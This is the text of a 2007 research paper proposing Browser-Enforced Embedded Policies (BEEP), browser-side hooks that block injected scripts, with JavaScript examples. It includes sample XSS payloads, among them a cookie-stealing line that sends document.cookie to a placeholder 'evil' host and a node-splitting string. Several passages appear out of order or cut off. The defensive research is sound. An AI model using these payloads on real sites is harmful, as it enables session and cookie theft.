WWW 2007 / Track: Security, Privacy, Reliability, and Ethics
Session: Defending Against Emerging Threats
Defeating Script Injection Attacks with Browser-Enforced Embedded Policies
Trevor Jim
AT&T Labs Research
Nikhil Swamy
University of Maryland, College Park
Michael Hicks
University of Maryland, College Park
ABSTRACT
Web sites that accept and display content such as wiki articles or comments typically filter the content to prevent injected script code from running in browsers that view the site. The diversity of browser rendering algorithms and the desire to allow rich content make filtering quite difficult, however, and attacks such as the Samy and Yamanner worms have exploited filtering weaknesses. This paper proposes a simple alternative mechanism for preventing script injection called Browser-Enforced Embedded Policies (BEEP). The idea is that a web site can embed a policy in its pages that specifies which scripts are allowed to run. The browser, which knows exactly when it will run a script, can enforce this policy perfectly. We have added BEEP support to several browsers, and built tools to simplify adding policies to web applications. We found that supporting BEEP in browsers requires only small and localized modifications, modifying web applications requires minimal effort, and enforcing policies is generally lightweight.
site itself, to remove scripts and other potentially harmful elements [23, 32, 21]. Filtering is complicated in practice. Sites want to allow their users to provide rich content, with images, hyperlinks, typographic stylings and so on. Scripts can be embedded in rich content in many ways, and it is nontrivial to disable the scripts without also disabling the rich content. One reason is that different browsers parse and render content differently: filtering that is effective for one browser can be ineffective for another. Moreover, browsers try to be forgiving, and can parse and render wildly malformed content, in unexpected ways. All of these complications have come into play in real attacks that have evaded server-side filtering (e.g., the Samy [30] and Yamanner [3] worms).

We propose a new technique to prevent script injection attacks, based on the following two observations:

Observation 1: Browsers perform perfect script detection. If a browser does not parse content as a script while it renders a web page, that content will not be executed.

Observation 2: The web application developer knows exactly what scripts should be executed for the application to function properly.

The first observation implies that the browser is the ideal place to filter scripts. Indeed, for some web applications (e.g., GPokr, S3AjaxWiki), most or all of the application logic is executed in the browser, with the web site acting only as a data store. For these applications, browser-side filtering may be the only option. The second observation implies that the web site should supply the filtering policy to the browser--it can specify which scripts are approved for execution and the browser will filter the rest. In short, the web site sets the policy and the browser enforces it. We call this strategy Browser-Enforced Embedded Policies (BEEP). There are many possible ways to implement BEEP.
In this paper, we have used a method that is easy to implement while still permitting very general policies. In our implementation, the security policy is expressed as a trusted JavaScript function that the web site embeds in the pages it serves. We call this function the security hook. A suitably modified browser passes each script it detects to the security hook during parsing (along with other relevant information) and will only execute the script if the hook approves it. Our implementation of BEEP has several advantages.

Flexible policies. The security hook can be any function that can be implemented in JavaScript. So far we have
Categories and Subject Descriptors
K.6.5 [Management of Computing and Information Systems]: Security and Protection--unauthorized access, invasive software
General Terms
Security
Keywords
Script injection, cross-site scripting, web application security
1. INTRODUCTION
Many web sites republish content supplied by their user communities, or by third parties such as advertising networks and search engines. If this republished content contains scripts, then visitors to the site can be exposed to attacks such as cross-site scripting (XSS) [2], and can themselves become participants in attacks on the web site and on others [16]. The standard defense is for the web site to filter or transform any content that does not originate from the
Copyright is held by the International World Wide Web Conference Committee (IW3C2). Distribution of these papers is limited to classroom use, and personal use by others. WWW 2007, May 8-12, 2007, Banff, Alberta, Canada. ACM 978-1-59593-654-7/07/0005.
implemented two simple kinds of policies (but we are not restricted to these policies). Our first policy is a whitelist, in which the hook function includes a one-way hash of each legitimate script appearing in the page. When a script is detected in the browser and passed to the hook function, the hook function hashes the script and matches it against the whitelist; any script whose hash is not in the list is rejected. Our second policy is a DOM sandbox. Here, the web application structures its pages to identify content that might include malicious scripts. The possibly-malicious user content is placed inside of a <div> or <span> element that acts as a sandbox:

    <div class="noexecute">
      ...possibly-malicious content...
    </div>
Within the sandbox, rich content (typographic styling, etc.) is enabled, but all scripts are disabled. When invoked, the hook function will examine the document in its parsed representation, a Document Object Model (DOM) tree. Beginning at the DOM node of the script, the hook function inspects all of the nodes up to the root of the tree, looking for "noexecute" nodes. If such a node is found, the script is not executed.1 While these policies are sufficient to stop injected scripts, other policies are also possible. For example, the hook function could also notify the web site when an injected script is found. A hook function could even analyze scripts and permit only a restricted class of scripts to execute. Policies can be easily modified over time: the new policy is simply embedded in the site's pages and will be enforced by browsers from then on.

Complete coverage. With policies like the whitelist and DOM sandbox, BEEP detects and filters all injected scripts, under two conditions. First, to use these policies, all approved scripts must be identified by the web site in advance, either directly (by enumerating them) or indirectly (by identifying where scripts cannot occur); this is straightforward for most applications (and is discussed in more detail in Sections 3.5 and 4.2). Second, the browser must install the security hook before any other scripts on the page are executed, to ensure complete mediation. This is easily accomplished: defining the hook as the first script in the document head ensures it will be parsed first. Together, these conditions imply that any non-approved script will be rejected before it has a chance to run.

Ease of deployment. Our method requires browser modifications, but has been chosen to minimize them. For example, the places where browsers need to be modified are easily identified: we simply locate places in the source code where the browser invokes the JavaScript interpreter.
These are the points where the browser has identified a script in a web page. At this point in the source code, the browser has gathered together all of the information needed to invoke the JavaScript interpreter, and we only need to insert code to invoke the interpreter on our security hook function first. Depending on the result of this first invocation, we will either execute the script from the page, or skip it. We successfully modified the Konqueror and Safari browsers to support security hooks, and we implemented partial support
1 We must take care to prevent cleverly formatted content from escaping its confines as discussed in Section 3.4.
[Figure 1: Script injection attack on a typical Wiki/Blog-based site, like MySpace. (Diagram omitted; it shows an attacker's browser entering rich content, including malicious scripts, through the site's data entry form, the web site's optional filter and storage, and a victim's browser whose requested page view displays the unfiltered malicious scripts, exposing its script interpreter and cookies.)]

in the closed-source Opera browser. These changes required just over 650 lines of code in the first two cases (compared to several hundred thousand for the browsers' rendering engines), and just over 100 lines of JavaScript for Opera. Web applications must also be modified to use BEEP, but the changes are simple and localized. We will show how we modified some existing web applications to embed policies, and describe some simple tools we built to help in this process.

Finally, deployment can proceed incrementally. Browsers that do not support hooks will still render pages that define hooks, albeit without the protection they offer. Servers can (and should) continue to filter user content, with BEEP serving as a second line of defense against scripts that escape detection. Moreover, while we intend that web sites be responsible for embedding appropriate policies, policies could also be embedded by other means. For example, a third party could generate a whitelist for an infected site, and a firewall or other proxy could insert the whitelist policy into pages served from that site.

Moderate overhead. When a browser renders a BEEP-enabled web page, there is some additional overhead for parsing the security hook function and executing the hook function whenever a script is parsed. After running some simple experiments we found that rendering overheads averaged 14.4% for whitelist policies and 6.6% for sandbox policies, typically amounting to a fraction of a second. These percentages do not include network time, which would further reduce overhead if accounted for.

The next section presents some background, and the remainder of the paper explains our BEEP technique and policies, describes our implementation, and presents experimental results. The paper concludes by comparing BEEP to related work.
2. BACKGROUND
Script injection, or cross-site scripting, is a very common vulnerability: according to MITRE's CVE list [20], it is the most common class of reported vulnerabilities, surpassing buffer overflows starting in 2005. Here we review script injection attacks and illustrate why it is difficult to filter scripts using standard server-side techniques.
2.1 Script Injection
We are concerned with attacks that cause a malicious script, typically written in JavaScript, to be injected into the content of a trusted web site. When a visitor views a page on the site, the injected script is loaded and executed in the visitor's browser with the trusted site's privileges. The injected script can leak privileged information (cookies, browsing history, and, potentially, any private content from the site) [2]. The script can also use the visitor's browser to carry out denial of service attacks or other attacks on the web site, or on others. If the web site is very popular, the attack can be greatly amplified [16].

[Figure 2: Ways of embedding scripts in web pages. (Listing omitted.)]

Script injection can be achieved in many ways. In cross-site scripting (XSS), the attacker often exploits web sites that insert user-provided text into pages without properly filtering the text. For example, members of on-line communities like MySpace, Blogger, and Flickr can enter their own content and add comments to the content of others. This content is stored on the site and may be viewed by anyone. If a malicious member manages to include a script in his content, any viewers of that content would run the script with the privileges of the site. And if a viewer were also a member of the site, the script could access or modify the viewer's content, including private information stored at the site or at the browser (e.g., as a cookie). Such an attack is shown in Figure 1.

Another way of injecting a script is by "reflection." For example, when asked for a non-existent page, many sites try to produce a helpful "not found" response that includes the URL of the non-existent page that was requested. Therefore, if the site is not careful, an occurrence of the text in the URL can be executed in the visitor's browser when it renders the "not found" page. To exploit this, an attacker can try to entice victims to follow URLs with targets that include scripts, e.g.,
http://trusted.site/
A third way of injecting a script exploits the dynamic nature of JavaScript-enabled web pages, where the HTML content served from the web server is altered in the browser by the execution of scripts. For instance, a site might be constructed so that a URL of the form
http://vulnerable.site/welcome.html?name=Joe
produces personalized content using a static HTML page in combination with an embedded script. In particular, the script can use features like innerHTML and document.write to modify the content of the page at the browser, personalized according to the value of "name." This opens the possibility that a malicious script can be constructed entirely in the browser, as a combination of "name" and other parameter values, as well as the text of the page itself.

This can be taken to an extreme: web applications like S3AjaxWiki [22] have no server-side logic at all. The application logic consists entirely of JavaScript code that executes in the browser, and the server is used solely as a data store. In this case, clearly any measures to combat malicious scripts must be taken in the browser (and S3AjaxWiki currently provides no such measures).
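To make the danger concrete, the following sketch mimics a page script that personalizes content from the "name" query parameter without any filtering. The function name, URLs, and parameter handling are illustrative assumptions, not code from the paper; in a real page the resulting string would be spliced into the document via document.write or innerHTML.

```javascript
// Hypothetical page script: personalize the page from the "name"
// query parameter, with no filtering (illustrative, not from the paper).
function personalize(url) {
  // Naive extraction of the "name" parameter.
  var m = /[?&]name=([^&]*)/.exec(url);
  var name = m ? decodeURIComponent(m[1]) : "visitor";
  // The raw value is spliced directly into the page's HTML.
  return "<h1>Welcome, " + name + "!</h1>";
}

// Benign use:
var ok = personalize("http://vulnerable.site/welcome.html?name=Joe");

// Malicious use: the "name" value carries a script, which a browser
// would parse and execute when the generated HTML is rendered.
var bad = personalize(
  "http://vulnerable.site/welcome.html?name=" +
  encodeURIComponent("<script>alert(document.cookie)</script>"));
```

Because the malicious markup never touches the server's static page, a purely server-side filter over stored content cannot catch it.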
2.2 Script Detection
The standard solution to script injection is for the web site to filter or transform all possibly-malicious content so that scripts are removed or made harmless, as shown in Figure 1. The simplest kind of filter is to escape the special characters in the content to prevent scripts, if any, from executing in the browser. For example, an occurrence of "<" in the content can be replaced by "&lt;", so that any markup in the content is rendered as text rather than parsed as HTML.
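The escaping filter just described can be sketched in a few lines; the function name is illustrative, and the four replacements shown are the usual minimum rather than a complete defense (which is exactly the point the paper goes on to make).

```javascript
// Minimal escaping filter: replace HTML metacharacters so embedded
// markup, including script tags, renders as inert text.
function escapeHTML(s) {
  return s.replace(/&/g, "&amp;")   // must run first
          .replace(/</g, "&lt;")
          .replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;");
}

var out = escapeHTML('<script>alert(document.cookie)</script>');
```

Escaping disables scripts but also disables all rich content, which is why sites that want to allow user markup must attempt the much harder task of selective filtering.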
3.2 The Security Hook
In our implementation of BEEP, a web site specifies its policy through a security hook that will be used to approve scripts before execution in the browser. The hook is communicated to the browser as the definition of a JavaScript function, afterParseHook. A specially-modified browser invokes afterParseHook whenever it parses a script while rendering pages. (The necessary browser modifications will be described shortly.) If the hook function returns true then the script is deemed acceptable and will be executed; otherwise it will be ignored.
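The hook protocol just described can be sketched as follows. The JSSecurity object is what a BEEP-modified browser exposes; here it and the page's window are stubbed so the sketch runs standalone, and the rejection rule is a deliberately trivial placeholder (the paper's real policies, whitelists and DOM sandboxes, come next).

```javascript
// Stub of the browser-provided object, so the sketch is self-contained.
var window = { JSSecurity: {} };

if (window.JSSecurity) {
  // The browser calls afterParseHook(code, elt) for every script it
  // parses; returning false causes the script to be skipped.
  window.JSSecurity.afterParseHook = function (code, elt) {
    // Placeholder policy for illustration only: reject any script
    // that mentions document.cookie.
    return code.indexOf("document.cookie") === -1;
  };
}

// Simulate the browser consulting the hook before execution:
var allowed = window.JSSecurity.afterParseHook("alert('hello')", null);
var blocked = window.JSSecurity.afterParseHook(
  "new Image().src = 'http://evil/?' + document.cookie", null);
```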
executes in some browsers.
2.3 Real World Examples
All of these issues--multiple vectors, encodings, and quirks in browsers--make script detection a hard problem, and give rise to dozens of techniques for hiding scripts from detection,
The security hook must implement complete mediation to be an effective defense: no script may escape scrutiny by the security hook before the script runs. This implies that the hook function must be installed before any malicious scripts are parsed and executed. While the HTML standard does not specify the order of parsing and execution, we have verified that in practice the major browsers parse and execute the first script in a document before any subsequent scripts.

Cleverly formatted content can escape a DOM sandbox by including markup, such as a premature closing tag, that splits the enclosing "noexecute" node. We call this trick node-splitting; similar tricks are used to illegally access hidden files in web servers (using .. in URLs) and to perform SQL injections. A simple variation solves the problem. The web application arranges for all possibly-malicious content to be encoded as a JavaScript string, and to be inserted as HTML into the document by a script, using innerHTML:
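The innerHTML variation can be sketched as server-side code that emits the sandboxed fragment; this is an illustrative reconstruction rather than the paper's exact code, and the helper names (jsStringLiteral, sandboxedFragment) and the element id n5 are hypothetical.

```javascript
// Encode untrusted content as a JavaScript string literal so it
// cannot escape the literal or terminate the surrounding script.
function jsStringLiteral(s) {
  return '"' + s.replace(/\\/g, "\\\\")
                .replace(/"/g, '\\"')
                .replace(/</g, "\\x3c")   // keeps "</script>" inert
                .replace(/\r/g, "\\r")
                .replace(/\n/g, "\\n") + '"';
}

// Emit a "noexecute" node created separately from its contents; the
// contents are inserted via innerHTML, so a stray closing tag in the
// untrusted string cannot split the node.
function sandboxedFragment(id, untrusted) {
  return '<div class="noexecute" id="' + id + '"></div>\n' +
         '<script>\n' +
         'document.getElementById("' + id + '").innerHTML = ' +
         jsStringLiteral(untrusted) + ';\n' +
         '</script>';
}

var frag = sandboxedFragment("n5", 'hi</div><script>evil()</script>');
```

Because every "<" in the untrusted content is encoded inside the string literal, the node-splitting payload survives only as inert text.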
For example, when the browser parses a script element such as <script>alert('hello')</script>, it invokes afterParseHook on the text of the script, i.e., "alert('hello')", and on the DOM node of the script element. The policy implemented by the hook function can be any boolean function that can be programmed in JavaScript. We have experimented with two kinds of policies: whitelists and DOM sandboxes. We discuss these next.
3.3 Whitelists
Most current web applications embed scripts in their web pages. Typically, the web application developer knows precisely which scripts belong in each page (but see Section 3.5). Therefore, the developer can write a security hook that checks that every script encountered by the browser is one of these known scripts; in other words, a whitelist policy.

We implement a whitelist in JavaScript as an associative array indexed by the SHA-1 hashes of the known scripts. When afterParseHook is invoked on a script, it hashes the script and checks whether the hash appears in the array. For example, if the script alert(0) is known, then whitelist[SHA1("alert(0)")] should be defined; if an included script such as <script src="aURL"> is known, then whitelist[SHA1("aURL")] should be defined. Here is a sample implementation:
    if (window.JSSecurity) {
      JSSecurity.afterParseHook = function(code, elt) {
        if (whitelist[SHA1(code)]) return true;
        else return false;
      };
      whitelist = new Object();
      whitelist["478zB3KkS+UnP2xz8x62ugOxvd4="] = 1;
      whitelist["AO0q/aTVjJ7EWQIsGVeKfdg4Gdo="] = 1;
      ... etc. ...
    }
The SHA1 function could be defined as part of the script in which the above code appears, or it could be part of a library provided by the browser to security hooks. The latter is clearly preferable: while JavaScript versions of cryptographic functions exist [12], they perform far worse than native implementations (cf. Section 5.2).
Here the "noexecute" node is created separately from its contents, so that there is no possibility of the contents splitting the node. The assignment of the string to the innerHTML property of the node causes the browser to parse and render the string as HTML, producing a DOM tree with the "noexecute" node as parent, even when the string contains a closing tag (such as </div>) that attempts to prematurely close the tag of the "noexecute" node. The rules for quoting special characters in JavaScript strings are simple, so there is no possibility of malicious content escaping from the string.

HTML frames cause an additional complication. A frame in a document introduces a child document. If an attacker injects a script included in a frame, our hook reaches the top of the frame without encountering the sandbox node,
and must continue searching in the parent document. The DOM does not provide easy access from the child to its place in the parent, so our hook must do some searching in the parent document to find the frame element. The complete implementation is available at the BEEP web site [10].
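The upward traversal at the heart of the sandbox policy can be sketched on stub DOM nodes so it runs standalone; the frame-crossing search just described is omitted here, and the stub objects stand in for real DOM elements.

```javascript
// Walk from a node toward the root, looking for a "noexecute" ancestor.
function inSandbox(node) {
  for (var n = node; n !== null; n = n.parentNode) {
    if (n.className === "noexecute") return true;
  }
  return false;
}

// A hook built from the traversal: reject scripts found in a sandbox.
function afterParseHook(code, elt) {
  return !inSandbox(elt);
}

// Stub DOM: root > div.noexecute > script1, and root > script2.
var root = { className: "", parentNode: null };
var sandbox = { className: "noexecute", parentNode: root };
var script1 = { className: "", parentNode: sandbox };
var script2 = { className: "", parentNode: root };
```

In a real browser the traversal must also contend with frames and with the parser quirks discussed in the implementation section.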
Session: Defending Against Emerging Threats
the HTML and JavaScript engines. This interface is bidirectional--the HTML engine invokes the JavaScript interpreter to execute scripts that it encounters while parsing the document, and a JavaScript function can modify the document tree that is managed by the HTML engine.

To implement afterParseHook, we had to take special care to ensure that certain modifications to the document tree that occur due to the execution of JavaScript do not result in invocations of the hook function. For instance, if a JavaScript function (already authorized by afterParseHook) chooses to insert a dynamically-generated script into the document, we must ensure that the hook function is not called once again. The majority of changes (in terms of lines of code) in both browsers were due to a small refactoring that was necessary to handle this case.

DOM sandboxing required some additional changes. To enforce DOM sandboxing, the afterParseHook must traverse the document tree from the location of the script towards the root of the tree. However, in a few cases the HTML parsers in Safari and Konqueror do not maintain a well-formed document tree when parsing JavaScript. This occurs, for instance, when parsing scripts that appear in the attributes of HTML elements, and this prevents the hook from determining whether or not a script is contained within a "noexecute" node. Therefore, we changed the HTML parsers to make the DOM tree well-formed in these cases. Note that the ECMA and DOM standards for JavaScript and HTML do not require the document tree to be well formed during parsing.

Opera. We also implemented partial support for our hooks in a closed-source browser, Opera. Opera supports a feature called User JavaScript, intended to allow users to customize the web pages of arbitrary sites.
For example, if a web site relies on non-standard behavior of Internet Explorer, an Opera user can write a User JavaScript that is invoked whenever a page from the site is rendered, and which rewrites the page content so that it renders correctly in Opera. The User JavaScript programming interface permits registering JavaScript callback functions to handle events that occur during parsing and rendering. Crucially, User JavaScript is executed before any scripts on the web page, and it can prevent any script on the web page from executing.

We have written a User JavaScript for Opera that does two things. First, it defines a JSSecurity object for every web page, within which a web page can register its afterParseHook function. Second, it registers a handler function that calls the user's JSSecurity.afterParseHook (if it exists) on script execution events. The Opera implementation handles ...
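The Opera glue just described can be sketched as follows. Opera's User JavaScript API and the page's window are stubbed here so the sketch runs standalone; the event name BeforeScript and the use of preventDefault reflect our reading of that API, and the event-dispatch at the end simulates what the browser would do.

```javascript
// Stubs standing in for the page global and Opera's User JS API.
var window = {};
var opera = {
  handlers: {},
  addEventListener: function (type, fn) { this.handlers[type] = fn; }
};

// The User JavaScript: expose JSSecurity and mediate script execution.
window.JSSecurity = {};
opera.addEventListener("BeforeScript", function (event) {
  var hook = window.JSSecurity.afterParseHook;
  if (hook && !hook(event.element.text, event.element)) {
    event.preventDefault();   // stop the script from running
  }
}, false);

// A page registers a trivial hook, then the "browser" fires the event:
window.JSSecurity.afterParseHook = function (code) {
  return code !== "evil()";
};
var cancelled = false;
opera.handlers["BeforeScript"]({
  element: { text: "evil()" },
  preventDefault: function () { cancelled = true; }
});
```

Because the User JavaScript runs before any page script, the handler is in place before a malicious script could tamper with JSSecurity.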